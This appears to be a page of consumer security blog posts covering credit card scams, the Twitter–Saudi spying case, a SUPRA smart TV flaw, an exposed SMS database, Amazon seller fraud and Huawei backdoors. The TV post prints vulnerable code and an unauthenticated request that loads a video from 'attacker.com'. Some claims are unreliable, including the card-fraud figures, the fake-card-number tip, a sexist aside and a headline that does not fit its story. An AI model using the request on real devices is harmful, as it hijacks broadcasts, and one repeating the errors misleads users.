5 Common Credit Card Scams That You Should Watch Out!

Scams are pretty much on every corner of the planet! Its like they are a part of the economy. Scammers are everywhere just waiting for you, waiting for an opening then they will strike. Some scammers will do their heist personally. They just sit on their chair and use a computer with internet and they can scam anybody so naïve just like you. The scam I am about to share to you is about credit card scams. Here are the five common credit card scams that you need to be aware off and easily prevent you from losing money.

Credit card scams mean when the hackers stole the card information through several methods or schemes that the naïve victim fall into. Hackers have high-tech knowledge of taking third party information well such as your credit card information that involves your name, credit card number, the CVV code and expiration date. Which all the information needs to start using your credit card.

Scammers uses the credit card and making legitimate purchases and making any payments online or even shopping locally if they have copied your whole credit card. Hundreds if not thousands fall trap on these credit card scams.

You should be glad that banks are upgrading their security system and providing their users a better and more secure banking experience such as enabling two-factor authentication method when buying something, they are hiring investigators to easily detect if anyone tries to hack the bank accounts’ information.

Here are the top 5 Credit Card Scams and How You Can Avoid Them

INFO

In 2019 more than 3$ million worth of credit card scams has been reported worldwide and 2.7$ million on the year before. That only means that these scammers are getting better on what they do. Without further ado here’s the top 5 most common credit card scams and we’ll help you avoid them.

Credit card or save up to a certain extent when the person uses the card with proper safety. Till today thousands of scams have taken place. Nowadays, people use credit cards at several places like while shopping online, purchasing online games, etc. The hacker installs software at different websites, which helps them to provide all the information.

The Top Five Credit Card Scams

1
Fake Shopping Website

Fake Shopping Website
Login into account in email envelope and fishing for private financial account information. Vector concept of phishing scam, hacker attack and web security

Hackers create their shopping websites and offer various discounts to attract customers. This is one of the most common credit card scams that every user can run into.

The primary purpose of making the website is to hack the card information of online shoppers. It is one of the simplest ways to create a scam and many falls for it. Especially women where they are so naïve with online hacking / scamming activities. The online payment technology has made payment easy but has also given rise to hacking.

Many people save their credit card information on an online website to make transactions in the future easily. The team of hackers steals the collected data. The person should prioritize cash on delivery instead of using credit cards. 

How to Avoid This Scam

Do not use your personal credit card when purchasing on unknown shopping website. Use cash on delivery method instead if they offer it. Otherwise, just forget about the website.

Before you use your personal credit card try using a fake credit card number with details first.

2
Fake WIFI connections

Many hackers trace the wifi details and try to hack personal information. Always buy products from genuine websites using only your trusted internet connection such as your own phone data. Or your own internet data device. They just connect to a FREE WIFI establishment as you do not know whose reading your data transmitted.

Be attentive while choosing WIFI network because it may cause a significant loss to the account holder.

How to Avoid This Scam

This scam is pretty easy to avoid. One should not connect to any untrusted WIFI network like the WIFI on your favorite café. Now, if you do not have a choice and need to connect to it. Then just use it with normally and do not buy anything online using that WIFI network. Browse the internet, check your social media accounts, update your Instagram account etc. Just remember do not input sensitive information such as your credit card information or login password.

3
Online Gaming Websites

Many people love playing games online. A lot of these games has their own monetary system that you can buy using real money and purchase your favorite item or character on the game. Avid players tempted to buy and eventually when they do they enter their credit card details to buy the game or credits or gold of their favorite game.

This method is fairly similar with the fake shopping website. Hackers target online gamers since some of them are just kids that uses their parents credit card which make them perfect victims.

How to Avoid This Scam

1. Now, if you are reading this meaning you are an adult with a credit card most probably. Don’t let anyone, yes anyone including your kids borrow your credit card or hide it somewhere where your kids cannot get access to it.
2. Buy only on legitimate websites.

4
Phone Call Frauds

Credit Card Scam Phone Call
Senior woman using phone while holding credit card.

Phone calls fraud is the simplest way to ask the information from the account holder. Hackers place the fake call and ask for the card details by creating a bewildering conversation game to the victim. Sometimes they lie to the users that their account is getting close, so if they will ask for your credit card information to avoid that from happening and the naïve victim provides the information.

The victim just handed out his / her credit card details and then minutes later you found out there has been a $5,000 worth of online purchase using your credit card.

How to Avoid This Scam

One should never share any sensitive information from your credit card. Even if they introduced their selves as someone from your bank. Even your bank will tell you to not share any information to any of their employees.

5
Game Account Hacking Scam

The scam / hacker will hack players game ID and password I don’t know how they could hack your game profile such as your Steam account but assuming that they do, they will use your saved credit card details and make another game purchase and send those details on their own accounts. The same card details are used to purchase other games.

The hacker keeps using the card until the balance gets to zero. The young generation is more into online games, so they need to keep their card details safe.

How to Avoid This Scam

One should avoid putting or saving credit card details for purchasing games from unknown sources.

Conclusion

Nowadays, one should be careful when making purchases using their credit cards and protecting their identity online. Many hackers have evolved and are better on what they do. Making fake websites is one thing. They are not only creating shopping websites but also making video games that attract kids. Some don’t even need to leave their house just to scam somebody. Children have the least knowledge of credit cards. Everyone should be responsible enough on their finances.

Taking care of your credit card is one of those. Go here for more detailed tips and tricks to avoid credit card scams. I hope you learn something and enjoyed the reading.

Two Former Employees of Twitter Caught Spying Thousands of Accounts for Saudi Arabia

Recently, two former employees have been charged for spying on thousands of Twitter users’ accounts on behalf of Saudi Arabian Government.

According to the indictment, one of the defendants is identified as Ahmad Abouammo. He is an American citizen who left twitter in May 2015.The other one is recognized as Ali Alzabara, a Saudi Arabian citizen who left twitter in December 2015. The two are accused of spying with their purpose of exposing the identity of non-conformist.

The two- ex employees were recruited in 2014 by Saudi government officials. Both have close ties with Mohammed Bin Salman, the Saudi Crown Prince. They are hired to access sensitive and non-public information of twitter accounts accompanied with known Saudi critics.

Email addresses, devices used, browser information, biographical information, birthdate and other information that can be used to verify user’s location like IP address together with accounts and phone numbers are just some of the information Abouammo and Alzabarah illegally accessed.

Alzabarah, one of the accused joined twitter in August 2013 as” Site Reliability Engineer “worked with the Saudi officials between May 21 and November 18, 2015.He allegedly accessed more than 6000 private data on twitter accounts.

There are at least 33 users included in the accounts he accessed. This made Saudi Arabian law enforcement submit emergency disclosure request to twitter.

Accordingly, Abouammo has also been separately charged for acting as a foreign agent and handing the Federal Bureau of Investigation (FBI) with distorted records to fetter the federal investigation.

The criminal complaint says he provided the FBI with a falsified, back – dated invoice charging an unnamed Saudi official $100,000 for “consulting services”.

Aside from spying on twitter users, he is also charged for deleting exact information from social media platforms, revealing identities of some users and shutting down twitter accounts granting request of the Saudi government officials.

According to the affidavit released by FBI, Saudi official paid up to $300,000 to Abouammo to do the task. His work includes trying to cover up with faked invoices to his personal need and provide himself a luxurious Hublot watch worth of $20,000.

Along with these two, another Saudi national namely Ahmed al Mutairi, head of Saudi Social Media Company was charged by US Department justice for his involvement in the case. He has been accused of acting as intermediary between the two former twitter employees and the Saudi Government officials.

After being arrested by the FBI on Tuesday in Seattle, Abouammo is currently in US custody while theremaining two suspects are believed to be in Saudi Arabia and still at large.

Twitter claimed that they cooperated in the investigation and limit access to sensitive account data only to limited of vetted employees.

 “We understand the incredible risks faced by many who use Twitter to share their perspective with the world and to those in power accountable. We have tools in place to protect their privacy and their ability to do their vital work,”

Twitter said in the statement.

SUPRA Smart TV brand Vulnerability: Prone to Attackers

Television has evolved so much this past few years, becoming a more like a personal computer. Thanks to the ever advancing technologies. Now we have SMART TV! And a lot of tech companies around the world manufacture Smart TVs because of course people want innovation and new experience on television.
But be careful, because these smart TVs are very phone to attackers.

Recently, Dhiraj Mishra shared his discovery on one smart TV brand’s vulnerability.  The brand is SUPRA Smart TV, this is a lesser-known Russian electronics brand, which distributes their products to Russia, China and UAE based ecommerce. They have variety of devices, from several audio and video equipment, to household appliances (such as Refrigerator, Laundry machines, kitchen appliances, etc.), to car electronics.

SUPRA Smart TV brand was discovered to be vulnerable to an unpatched remote file, which could allow WiFi attackers to broadcast fake videos to the TV screens without any series of authentication. The vulnerability was found in “openLiveURL” function of the SUPRA Smart TV. This vulnerability could allow a local attacker to inject a remote file in the broadcast and play fake videos.

According to Mishra: “We are abusing `openLiveURL()` which allows a local attacker to broadcast video on supra smart cloud TV. I found this vulnerability initially by source code review and then by crawling the application and reading every request helped me to trigger this vulnerability.

Vulnerable code:

 function openLiveTV(url)
   {
   $.get("/remote/media_control", {m_action:'setUri',m_uri:url,m_type:'video/*'},
    function (data, textStatus){
    if("success"==textStatus){
     alert(textStatus);
    }else
    {
     alert(textStatus);
    }
   });
   }

Vulnerable request:

GET
/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8
HTTP/1.1

Host: 192.168.1.155

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0)
Gecko/20100101 Firefox/66.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Source: https://www.inputzero.io/2019/06/hacking-smart-tv.html

Significant requirement for the attacker to remotely control the SUPRA smart TV is having access to the victim’s WiFi Network by default, so it is important to not share your WiFi password to anyone you do not know or trust, or change your password regularly or set up a very strong password.

So imagine watching your favourite TV show with your kids and then all of a sudden your smart TV screen goes into adult-rated shows, so disgusting right? Or watching your favourite news and then a fake video of an emergency message came up, it would could cause so much panic. It is always important to select the trusted brands to somehow avoid having these vulnerabilities and compromising your information.

Stack Overflow Q&A Platform breach- Users’ Data has been compromised

Bob Diachenko, a Cyber Threat Intelligence Director and a journalist at SecurityDiscovery.com has uncovered a massive SMS Bombing Operation that exposes millions of users’ information.

You might be wondering why is the uncovering of SMS bombing so relevant. Well, let us start first to elaborate what is SMS Bombing, it is basically sending duplicated text messages that can be sent to several cellular phone users at a time. It uses a software program called “SMS Bomber”, this software program is mostly used for SMS marketing products and services by legitimate companies. However, these companies have their customers consent to receive such text messages. In the case of this passwordless database which was uncovered by Bob Diachenko on April 11th, the users’ information might be used by hackers or fraudster for illegal acts such as phishing techniques.

According to Bob Diachenko on the article he published for SecurityDiscovery.com, he discovered an unprotected MongoDB instance named ApexSMS, this database has millions of data relevant to SMS operations, in fact, according to Diachenko, one prominent folder contained an astounding 80, 055, 125 records.

Breached data contained in the database were as follows:

  • Hashed email
  • First and Last Name
  • City, State, Country and Zip Codes
  • IP Address
  • Phone Number
  • Carrier Network for Mobile
  • Line Type (Mobile or Landline)

Allegedly the owners of this database may have an official cover as MobileDrip.com, however it is not yet confirmed since they have not receive yet any response from Mobiledrip.com, which according to its website:

Mobile Drip is a cloud based SMS platform that’s optimized for high volume messaging with all the tracking, automation, segmentation, and data management features you need to maximize the profitability of your campaigns.”

The also indicated on their website that they will not knowingly engage in spam.

Legitimate companies mostly use SMS Marketing, thus Mobiledrip.com clearly describe how automated SMS Marketing works:

  • Attach drip campaigns to your lists and list segments to completely automate your sending.
  • Drip campaigns include the same features as broadcasting
  • Rotating Providers, Rotating Messages
  • Auto-replacing Domains
  • Segmenting data by carrier, gender, ethnicity, and location so you can optimize the messages you’re sending based on the leads
  • View stats for each message inside the drip campaigns
  • View drip message queue and history with stats on all messages.

On the other hand, Diachenko said that these information might be used to trick people to click on untrusted links or any phishing techniques which mostly victimized older people. Thus, this issue really raises concern about security and protection of the users’ information, it also affects the legitimate companies who does SMS Marketing to send information to their customers.

With this, let us all be careful to believe in text messages that we received, especially those which came from an unknown number or source. Always make sure to validate first, it is ok to be doubtful sometimes especially when you know that your information security is at stake.

Amazon Was Victimized By a Pervasive Fraud with Hackers Stealing Merchant Funds

The world’s biggest online retail platform, and ecommerce giant, Amazon Inc. was victimized of an extensive fraud from May to October of 2018, according to a U.K legal document.

Amazon lawyer said it already had done an investigation about the incident and asked a London judge to approve searches of account statements in which hackers funneled the funds into. Hackers were able to break in to more than 100 seller accounts and siphoned cash from sales and loans directly to their own bank accounts, which was reported to be wtih Barclays Plc and Prepaid Technologies Ltd.

Amazon legal counsel said that hackers may have used phishing techniques to obtain sellers log in credentials, thus giving them pledge access to their accounts and then changed their bank account information to their own. And their investigation confirms that the first instance of hacking activity was on May 16, 2018.

Though it is unclear on how much the hackers stole, Amazon said that it issued more than $1 billion dollars in loans to merchant in 2018, that makes the incident more concerning since the amount of money involve might be millions. Amazon Inc. said that it will continue to enhance and develop its online system to make sure these incidents will not happen again, and also sends message to the affected seller, as well as to those who are not, to be very vigilant about phishing techniques.

On the court filing, Amazon lawyers said that they need the documents “to investigate the fraud, identify and pursue the wrongdoers, locate the whereabouts of misappropriated funds, bring the fraud to an end and deter future wrongdoing,”.

Barclay Plc particularly said that they have strict guidelines and a very sophisticated fraud system and will make sure the incident will be dealt with accordingly. Both Barclay Plc and Prepaid Technologies were known to be party associated with Mactercard Inc. 

Amazon upholds its promise to their customer about protection and security of their information, following with another technical issue of their websites that occurred before Black Friday last year, this was when the issue inadvertently posted customer names and email addresses to its website. This incident has been taken care of swiftly, Amazon sends out an email notification to their affected customers regarding the technical issue, the customers were told on the email about:

“Our website inadvertently disclosed your email address or name and email address due to a technical error. The issue has been fixed. This is not a result of anything you have done, and there is no need for you to change your password or take any other action. The impacted customers have been contacted. Amazon takes all security-related matters very seriously and your account security is our top priority. We have policies and security measures in place to ensure that your personal information remains secure.”

– Amazon sends out email to their affected customers.

Hidden Backdoors in Huawei-supplied Vodafone Equipment Found

Hidden Backdoors in Huawei Chips for Vodafone Found

It was last quarter of 2007 when Huawei and Vodafone strategic partnership started, Huawei Technologies Co. Ltd. sends equipment to Vodafone, like routers. Since then, this strategic partnership has led to many more other opportunities, including the recently announce 5G network project.

But the same as usual friendship stories, Huawei and Vodafone has faced some compromising situations.

Back in 2009 when Vodafone initially found some bugs in Huawei routers, the Chinese-giant tech company immediately took an action and made sure that the issue has been fixed. And true enough, business went back as usual. Hidden Backdoors in Huawei devices are rampant and has been criticized by the United States.

But according to Bloomberg report, in 2011 and 2012 there are some backdoors that were found by Vodafone from the Huawei equipment. Particularly, in 2011, Vodafone, Italy, revealed that upon further penetration testing and checking, there are backdoors identified in some parts of its fixed access network known as optical service nodes, which are responsible for transmitting internet connection over optical fibers. In 2012, another identified backdoor found on other parts called broadband network gateway, which are responsible for user authentication and access to the internet. According to reports these vulnerabilities were also present in United Kingdom, Spain, Portugal and Germany.

Backdoors are their entry on committing Cybersecurity crimes

Hidden Backdoors in Huawei Chips

Backdoors, in cybersecurity terms, is somewhat like a hidden program, it bypasses security controls to access systems. These backdoors were actually common to software program for legitimate uses, for example, providing manufacturers in restoring users’ password.

Thus, this issue raises concern about potential unauthorized access to users’ information. But both Vodafone and Huawei assured that these vulnerabilities has been resolved the same year it was discovered. Hidden Backdoors in Huawei are blatantly used by some hackers

The United States on the other hand, alongside some other countries have already banned Huawei products due to some security concerns. Joining the United States were Australia, Japan and Taiwan.

The ban from the United States were based on the allegations of the Trump administration, that these equipment might invite some espionage from the Chinese State, and trying to persuade other western countries to block Huawei’s equipment as well. And so Canada and New Zealand were most likely to follow the step. But the Chinese tech-giant Huawei has denied the allegations, saying that they have nothing to do with the Chinese government.

With this, Vodafone, Europe’s largest telecommunication company, said that they are opposing the banning of Huawei’s equipment saying that Washington should prove their allegations. This amid the race for 5G network technology projects that Huawei and Vodafone signed for a strategic partnership. Europe is Huawei’s largest market outside China.

According to the company statement from Vodafone,

“In the telecoms industry it is not uncommon for vulnerabilities in equipment from suppliers to be identified by operators and other third parties, Vodafone takes security extremely seriously and that is why we independently test the equipment we deploy to detect whether any such vulnerabilities exist. If a vulnerability exists, Vodafone works with that supplier to resolve it quickly.”

Vodafone

On the other hand, Huawei issued a statement saying. “Like every ICT vendor we have a well-established public notification and patching process, and when a vulnerability is identified we work closely with our partners to take the appropriate corrective action.”